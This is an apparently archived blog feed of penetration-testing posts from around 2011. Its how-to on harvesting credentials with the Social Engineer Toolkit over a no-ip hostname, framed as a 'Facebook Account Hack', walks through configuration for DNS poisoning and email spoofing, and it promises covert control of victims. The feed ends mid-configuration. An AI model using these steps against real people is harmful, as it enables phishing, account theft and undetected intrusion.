<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/atom10full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><feed xmlns="http://www.w3.org/2005/Atom" xmlns:openSearch="http://a9.com/-/spec/opensearch/1.1/" xmlns:georss="http://www.georss.org/georss" xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr="http://purl.org/syndication/thread/1.0" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" gd:etag="W/&quot;DEEGQ3s_cSp7ImA9WhRaFEk.&quot;"><id>tag:blogger.com,1999:blog-1859513259990287065</id><updated>2012-02-16T18:43:42.549-08:00</updated><category term="hack metasploit meterpreter reverse_tcp tcp reverser backtrack 4 linux windows os computers" /><category term="backtrack 5 proxy privoxy proxychains" /><title>Security Exploiter</title><subtitle type="html">Tutorials!!
This blog is designed to show you how an attacker (hacker) would or could gain access to a system. In-order for you to not get caught out by the hacker.

Also the video tutorials are brilliant for the new learners who want to learn about penetration testing (hacking).

If you could give me as much feed back as possible that would be appreciated....  Thank You and Enjoy</subtitle><link rel="http://schemas.google.com/g/2005#feed" type="application/atom+xml" href="http://securityexploiter.blogspot.com/feeds/posts/default" /><link rel="alternate" type="text/html" href="http://securityexploiter.blogspot.com/" /><author><name>Security Exploiter</name><uri>http://www.blogger.com/profile/17393169150191998081</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><generator version="7.00" uri="http://www.blogger.com">Blogger</generator><openSearch:totalResults>11</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/atom+xml" href="http://feeds.feedburner.com/SecurityExploiter" /><feedburner:info uri="securityexploiter" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><entry gd:etag="W/&quot;DU4MRHg_fyp7ImA9WhZUEk0.&quot;"><id>tag:blogger.com,1999:blog-1859513259990287065.post-6891830492903357400</id><published>2011-06-04T10:19:00.000-07:00</published><updated>2011-06-04T10:19:45.647-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-06-04T10:19:45.647-07:00</app:edited><title>NEED YOU!</title><content type="html">Hi all,&lt;br /&gt;
&lt;br /&gt;
First off thanks for your support over YouTube I am&amp;nbsp;grateful.&lt;br /&gt;
&lt;br /&gt;
Ok so i have been busy with creating a new site as blogger is a bit basic and i am also going to be running a forum but this will be&amp;nbsp;allot&amp;nbsp;of work for me, so I am looking for anyone with good knowledge of backtrack, forum&amp;nbsp;administration&amp;nbsp;and so on to assist me in creating a good service .....i have some big plans and this is an&amp;nbsp;opportunity&amp;nbsp;to come and join me and make something great..........Im looking props for a team of 5&amp;nbsp;ultimately&amp;nbsp;but will start off with just a few.&lt;br /&gt;
&lt;br /&gt;
If you wish to talk to me about it feel free to do so.&lt;br /&gt;
contact me over youtube or on here&lt;br /&gt;
&lt;br /&gt;
Thanks&lt;br /&gt;
&lt;br /&gt;
Slayer231091&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1859513259990287065-6891830492903357400?l=securityexploiter.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/xxULNQApQdSF8rYDYNXv5xxL19k/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/xxULNQApQdSF8rYDYNXv5xxL19k/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/xxULNQApQdSF8rYDYNXv5xxL19k/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/xxULNQApQdSF8rYDYNXv5xxL19k/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/SecurityExploiter/~4/9N0_NEnLzNQ" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://securityexploiter.blogspot.com/feeds/6891830492903357400/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://securityexploiter.blogspot.com/2011/06/need-you.html#comment-form" title="1 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/1859513259990287065/posts/default/6891830492903357400?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/1859513259990287065/posts/default/6891830492903357400?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SecurityExploiter/~3/9N0_NEnLzNQ/need-you.html" title="NEED YOU!" /><author><name>Security Exploiter</name><uri>http://www.blogger.com/profile/17393169150191998081</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><thr:total>1</thr:total><feedburner:origLink>http://securityexploiter.blogspot.com/2011/06/need-you.html</feedburner:origLink></entry><entry gd:etag="W/&quot;D0cDRns5cCp7ImA9WhZXGEs.&quot;"><id>tag:blogger.com,1999:blog-1859513259990287065.post-6840310056094631154</id><published>2011-05-08T07:21:00.001-07:00</published><updated>2011-05-08T07:31:17.528-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-05-08T07:31:17.528-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="backtrack 5 proxy privoxy proxychains" /><title>Backtrack 5 is going be here in 2 DAYS!!!!  10th May!!</title><content type="html">&lt;span class="Apple-style-span" style="color: #38761d;"&gt;OK im sure alot of you know that the knew Backtrack 5 will be coming out in 2days, and i am so excited!.&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;iframe frameborder="0" height="225" src="http://player.vimeo.com/video/23347352?title=0&amp;amp;byline=0&amp;amp;portrait=0&amp;amp;color=ff9933" width="400"&gt;&lt;/iframe&gt;&lt;br /&gt;
&lt;a href="http://vimeo.com/23347352"&gt;BackTrack 5  - Penetration Testing Distribution&lt;/a&gt; from &lt;a href="http://vimeo.com/offsec"&gt;Offensive Security&lt;/a&gt; on &lt;a href="http://vimeo.com/"&gt;Vimeo&lt;/a&gt;.&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style="color: black; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;Its been totally redone with loads of added features, These are some of the main points:&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="color: black; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="color: black; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;/div&gt;&lt;ul style="color: black; font-family: Tahoma, verdana, arial; font-size: 14px;"&gt;&lt;li style="font-size: 13px; margin-bottom: 5px; margin-left: -10px; text-align: left;"&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;Our release will start on May 10th (don’t bug us about the timezone), and will primarily be available for download via torrents. This is to reduce the massive load on our mirrors for the first few hours.&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li style="font-size: 13px; margin-bottom: 5px; margin-left: -10px; text-align: left;"&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;As time progresses into&amp;nbsp; the release , we will then allow direct downloads from our mirrors.&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li style="font-size: 13px; margin-bottom: 5px; margin-left: -10px; text-align: left;"&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;We will have KDE (4.6) and Gnome (2.6) Desktop environment flavours&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li style="font-size: 13px; margin-bottom: 5px; margin-left: -10px; text-align: left;"&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;32 and 64 bit support&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li style="font-size: 13px; margin-bottom: 5px; margin-left: -10px; text-align: left;"&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;A basic ARM BackTrack image which can be chrooted into from android enabled devices. (hopefully released May 10th)&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li style="font-size: 13px; margin-bottom: 5px; margin-left: -10px; text-align: left;"&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;The 32 and 64 bit images support “Forensics Mode”, which boots a forensically sound instance of BackTrack and “Stealth mode”, which boots without generating network traffic.&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li style="font-size: 13px; margin-bottom: 5px; margin-left: -10px; text-align: left;"&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;All support for Backtrack 4 will end on May 10th, 2011 and BackTrack 4 will not be available for download from our official mirrors from that date onwards.&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li style="font-size: 13px; margin-bottom: 5px; margin-left: -10px; text-align: left;"&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;And yes, Metasploit 3.7.0 *was* packaged into BT5.&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;div style="color: black;"&gt;&lt;/div&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;I have been waiting for this and have a load of videos to make on it, i have been not making any as i wanted to show them on backtrack 5 so a small list of things ill be bringing out is:&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;-Put backtrack behind a proxy using tor, privoxy, proxychains -&amp;nbsp;making&amp;nbsp;you&amp;nbsp;Anonymous&amp;nbsp;weather it be surfing &amp;nbsp; &amp;nbsp; &amp;nbsp;the net to Nmap scans or even when using metaploit and various programs!&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;-Cracking Wireless networks, with a follow on on how to&amp;nbsp;compromise&amp;nbsp;a system after you have cracked the wireless.&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;-Setting up a SSH Tunnel on the remote (victims) machine through metasploit meterpreter ( this is a cleaver little Technique to use as u can have full full full control over victim and not get caught.) Also after i manually did it by hand i did a bit of digging as i couldnt see why know one had thought about it before and i only found one small article about doing&amp;nbsp;exactly&amp;nbsp;what i did but in this article the guy has created a Meterpreter .rb file so it automates &amp;nbsp;the manual procedure of installing the SSH, &amp;nbsp;but i shall show you how to do both!&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;-Possibly make a vid on how to install the new Backtrack 5 not sure yet tho.&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;Thats just a few things i have lined up ready for you guys!&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;Sorry to keep you guys waiting for new vids but I wanted to show you it on backtrack 5 just in case its changed alot!&amp;nbsp;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1859513259990287065-6840310056094631154?l=securityexploiter.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/KHrDRBgZOtpZOcDIZoQrkdy0cP8/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/KHrDRBgZOtpZOcDIZoQrkdy0cP8/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/KHrDRBgZOtpZOcDIZoQrkdy0cP8/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/KHrDRBgZOtpZOcDIZoQrkdy0cP8/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/SecurityExploiter/~4/GzqviPwrlIM" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://securityexploiter.blogspot.com/feeds/6840310056094631154/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://securityexploiter.blogspot.com/2011/05/backtrack-5-is-going-be-here-in-2-days.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/1859513259990287065/posts/default/6840310056094631154?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/1859513259990287065/posts/default/6840310056094631154?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SecurityExploiter/~3/GzqviPwrlIM/backtrack-5-is-going-be-here-in-2-days.html" title="Backtrack 5 is going be here in 2 DAYS!!!!  10th May!!" /><author><name>Security Exploiter</name><uri>http://www.blogger.com/profile/17393169150191998081</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><thr:total>0</thr:total><feedburner:origLink>http://securityexploiter.blogspot.com/2011/05/backtrack-5-is-going-be-here-in-2-days.html</feedburner:origLink></entry><entry gd:etag="W/&quot;Dk4NRH89fyp7ImA9Wx9QEU0.&quot;"><id>tag:blogger.com,1999:blog-1859513259990287065.post-4653375725879599922</id><published>2010-12-23T03:49:00.000-08:00</published><updated>2010-12-23T03:49:55.167-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-12-23T03:49:55.167-08:00</app:edited><title>AVG Internet Security - Firewall Test! Quick Nmap Scan</title><content type="html">&lt;iframe align="left" frameborder="0" marginheight="0" marginwidth="0" scrolling="no" src="http://rcm.amazon.com/e/cm?t=security078-20&amp;amp;o=1&amp;amp;p=8&amp;amp;l=bpl&amp;amp;asins=B003WT1KFA&amp;amp;fc1=000000&amp;amp;IS2=1&amp;amp;lt1=_blank&amp;amp;m=amazon&amp;amp;lc1=0000FF&amp;amp;bc1=000000&amp;amp;bg1=FFFFFF&amp;amp;f=ifr" style="align: left; height: 245px; padding-right: 10px; padding-top: 5px; width: 131px;"&gt;&lt;/iframe&gt;Hi all this is just a short post .......... To help keep yourselves protected better I&amp;nbsp;recommend&amp;nbsp;AVG 2011 full. In the video I show one reason why you should.....its has an amazing firewall. As demonstrated in the video. I will be making more videos about how AVG is great later on :) enjoy!!&lt;br /&gt;
&lt;br /&gt;
&lt;iframe class="youtube-player" frameborder="0" height="390" src="http://www.youtube.com/embed/M2vnDfOiz9A" title="YouTube video player" type="text/html" width="640"&gt;&lt;/iframe&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1859513259990287065-4653375725879599922?l=securityexploiter.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/Q_9PZOpfeUY1frq5pphZUkFX5cQ/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/Q_9PZOpfeUY1frq5pphZUkFX5cQ/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/Q_9PZOpfeUY1frq5pphZUkFX5cQ/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/Q_9PZOpfeUY1frq5pphZUkFX5cQ/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/SecurityExploiter/~4/R0em1FcOKb4" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://securityexploiter.blogspot.com/feeds/4653375725879599922/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://securityexploiter.blogspot.com/2010/12/avg-internet-security-firewall-test.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/1859513259990287065/posts/default/4653375725879599922?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/1859513259990287065/posts/default/4653375725879599922?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SecurityExploiter/~3/R0em1FcOKb4/avg-internet-security-firewall-test.html" title="AVG Internet Security - Firewall Test! Quick Nmap Scan" /><author><name>Security Exploiter</name><uri>http://www.blogger.com/profile/17393169150191998081</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://img.youtube.com/vi/M2vnDfOiz9A/default.jpg" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://securityexploiter.blogspot.com/2010/12/avg-internet-security-firewall-test.html</feedburner:origLink></entry><entry gd:etag="W/&quot;AkQCSHc-eCp7ImA9Wx9RFEk.&quot;"><id>tag:blogger.com,1999:blog-1859513259990287065.post-5725359511939595446</id><published>2010-12-15T12:29:00.000-08:00</published><updated>2010-12-15T13:26:09.950-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-12-15T13:26:09.950-08:00</app:edited><title>How To: Remote Harvest Credentials (no-ip) e.g. Facebook Account Hack</title><content type="html">&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;a href="http://www.amazon.com/Beginning-Linux-Programming-Neil-Matthew/dp/0470147628?ie=UTF8&amp;amp;tag=security078-20&amp;amp;link_code=bil&amp;amp;camp=213689&amp;amp;creative=392969" imageanchor="1" target="_blank"&gt;&lt;/a&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;iframe align="left" frameborder="0" marginheight="0" marginwidth="0" scrolling="no" src="http://rcm.amazon.com/e/cm?t=security078-20&amp;amp;o=1&amp;amp;p=8&amp;amp;l=bpl&amp;amp;asins=0470147628&amp;amp;fc1=000000&amp;amp;IS2=1&amp;amp;lt1=_blank&amp;amp;m=amazon&amp;amp;lc1=0000FF&amp;amp;bc1=000000&amp;amp;bg1=FFFFFF&amp;amp;f=ifr" style="align: left; height: 245px; padding-right: 10px; padding-top: 5px; width: 131px;"&gt;&lt;/iframe&gt;In this post I will first go over whats in the video then I will show you how to edit the config file for SET&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;BTW in this vid im running ubuntu 10.10 with macbuntu installed&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;iframe class="youtube-player" frameborder="0" height="390" src="http://www.youtube.com/embed/N8AD8c0vDkQ" title="YouTube video player" type="text/html" width="640"&gt;&lt;/iframe&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;To do this attack online instead of on the local subnet which I showed you last you will need to use a DNS service in the video I use no-ip.com. Just make an account and assign a host name to your ip. this will act as a website URL to your ip with you webserver running on.&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;In the video I mention something that is different to the setup of the server from the last video and that is the fact I had to enter my ip address this is because I have edited the config file to suit my other preferences and options avalible in the SET script. Which im now about to move onto. For the next load of text I have been lazy and have used the site&amp;nbsp;&lt;a href="http://www.social-engineer.org/framework/Computer_Based_Social_Engineering_Tools:_Social_Engineer_Toolkit_(SET)"&gt;http://www.social-engineer.org/framework/Computer_Based_Social_Engineering_Tools:_Social_Engineer_Toolkit_(SET)&lt;/a&gt;&amp;nbsp;which is the people who made SET. I have just cut some of the relevance stuff out and pasted to this page. But I would encourage a read of the link as it gives a good understanding of how each attack vectors and options work which I wont cover in this post.&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;Now to edit the config file which is locate at&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;----------------------------------------------&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;root@bt:/pentest/exploits/SET/config# ls&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;mailing_list.txt &amp;nbsp;set_config &amp;nbsp;set_config.save&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;----------------------------------------------&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;To edit the set_config type " nano set_config" or replace nano with you&amp;nbsp;preferred&amp;nbsp;text editor nano is mine.&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;Now for the copy and past :)&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;----------------------------------------------&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: sans-serif; font-size: 15px; line-height: 22px;"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;h2 style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: none; background-origin: initial; border-bottom-color: rgb(170, 170, 170); border-bottom-style: solid; border-bottom-width: 1px; color: #38761d; font-size: 23px; font-weight: normal; margin-bottom: 0.6em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0.17em; padding-top: 0.5em;"&gt;&lt;span class="mw-headline" id="Beginning_with_the_Social_Engineer_Toolkit"&gt;Beginning with the Social Engineer Toolkit&lt;/span&gt;&lt;/h2&gt;&lt;div style="color: #38761d; line-height: 1.5em; margin-bottom: 0.5em; margin-left: 0px; margin-right: 0px; margin-top: 0.4em;"&gt;The brains behind SET is its configuration file. SET by default works perfect for most people however, advanced customization may be needed in order to ensure that the attack vectors go off without a hitch. First thing to do is ensure that you have updated SET, from the directory:&lt;/div&gt;&lt;pre style="background-attachment: initial; background-clip: initial; background-color: grey; background-image: initial; background-origin: initial; border-bottom-color: rgb(47, 111, 171); border-bottom-style: dashed; border-bottom-width: 1px; border-left-color: rgb(47, 111, 171); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(47, 111, 171); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(47, 111, 171); border-top-style: dashed; border-top-width: 1px; line-height: 1.1em; padding-bottom: 1em; padding-left: 1em; padding-right: 1em; padding-top: 1em; width: 875px;"&gt;root@bt:/pentest/exploits/SET# svn update
U    src/payloadgen/payloadgen.py
U    src/java_applet/Java.java
U    src/java_applet/jar_file.py
U    src/web_clone/cloner.py
U    src/msf_attacks/create_payload.py
U    src/harvester/scraper.py
U    src/html/clientside/gen_payload.py
U    src/html/web_server.py
U    src/arp_cache/arp_cache.py
U    set
U    readme/CHANGES
Updated to revision 319.
root@bt:/pentest/exploits/SET#&lt;span class="Apple-style-span" style="color: #38761d;"&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;div style="color: #38761d; line-height: 1.5em; margin-bottom: 0.5em; margin-left: 0px; margin-right: 0px; margin-top: 0.4em;"&gt;Once you’ve updated to the latest version, start tweaking your attack by editing the SET configuration file. Let’s walk through each of the flags:&lt;/div&gt;&lt;pre style="background-attachment: initial; background-clip: initial; background-color: grey; background-image: initial; background-origin: initial; border-bottom-color: rgb(47, 111, 171); border-bottom-style: dashed; border-bottom-width: 1px; border-left-color: rgb(47, 111, 171); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(47, 111, 171); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(47, 111, 171); border-top-style: dashed; border-top-width: 1px; line-height: 1.1em; padding-bottom: 1em; padding-left: 1em; padding-right: 1em; padding-top: 1em; width: 875px;"&gt;root@bt:/pentest/exploits/set# nano config/set_config

# DEFINE THE PATH TO METASPLOIT HERE, FOR EXAMPLE /pentest/exploits/framework3
METASPLOIT_PATH=/pentest/exploits/framework3&lt;span class="Apple-style-span" style="color: #38761d;"&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;div style="color: #38761d; line-height: 1.5em; margin-bottom: 0.5em; margin-left: 0px; margin-right: 0px; margin-top: 0.4em;"&gt;Looking through the configuration options, you can change specific fields to get a desired result. In the first option, you can change the path of where the location of Metasploit is. Metasploit is used for the payload creations, file format bugs, and for the browser exploit sections.&lt;/div&gt;&lt;pre style="background-attachment: initial; background-clip: initial; background-color: grey; background-image: initial; background-origin: initial; border-bottom-color: rgb(47, 111, 171); border-bottom-style: dashed; border-bottom-width: 1px; border-left-color: rgb(47, 111, 171); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(47, 111, 171); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(47, 111, 171); border-top-style: dashed; border-top-width: 1px; line-height: 1.1em; padding-bottom: 1em; padding-left: 1em; padding-right: 1em; padding-top: 1em; width: 875px;"&gt;# SPECIFY WHAT INTERFACE YOU WANT ETTERCAP TO LISTEN ON, IF NOTHING WILL DEFAULT
# EXAMPLE: ETTERCAP_INTERFACE=wlan0
ETTERCAP_INTERFACE=eth0
#
# ETTERCAP HOME DIRECTORY (NEEDED FOR DNS_SPOOF)
ETTERCAP_PATH=/usr/share/ettercap&lt;span class="Apple-style-span" style="color: #38761d;"&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;div style="color: #38761d; line-height: 1.5em; margin-bottom: 0.5em; margin-left: 0px; margin-right: 0px; margin-top: 0.4em;"&gt;The Ettercap section can be used when you’re on the same subnet as the victims and you want to perform DNS poison attacks against a subset of IP addresses. When this flag is set to ON, it will poison the entire local subnet and redirect a specific site or all sites to your malicious server running.&lt;/div&gt;&lt;pre style="background-attachment: initial; background-clip: initial; background-color: grey; background-image: initial; background-origin: initial; border-bottom-color: rgb(47, 111, 171); border-bottom-style: dashed; border-bottom-width: 1px; border-left-color: rgb(47, 111, 171); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(47, 111, 171); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(47, 111, 171); border-top-style: dashed; border-top-width: 1px; line-height: 1.1em; padding-bottom: 1em; padding-left: 1em; padding-right: 1em; padding-top: 1em; width: 875px;"&gt;# SENDMAIL ON OR OFF FOR SPOOFING EMAIL ADDRESSES
SENDMAIL=OFF&lt;span class="Apple-style-span" style="color: #38761d;"&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;div style="color: #38761d; line-height: 1.5em; margin-bottom: 0.5em; margin-left: 0px; margin-right: 0px; margin-top: 0.4em;"&gt;Setting the SENDMAIL flag to ON will try starting SENDMAIL, which can spoof source email addresses. This attack only works if the victim’s SMTP server does not perform reverse lookups on the hostname. SENDMAIL must be installed. If your using BackTrack 4, it is installed by default.&lt;/div&gt;&lt;pre style="background-attachment: initial; background-clip: initial; background-color: grey; background-image: initial; background-origin: initial; border-bottom-color: rgb(47, 111, 171); border-bottom-style: dashed; border-bottom-width: 1px; border-left-color: rgb(47, 111, 171); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(47, 111, 171); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(47, 111, 171); border-top-style: dashed; border-top-width: 1px; line-height: 1.1em; padding-bottom: 1em; padding-left: 1em; padding-right: 1em; padding-top: 1em; width: 875px;"&gt;# SET TO ON IF 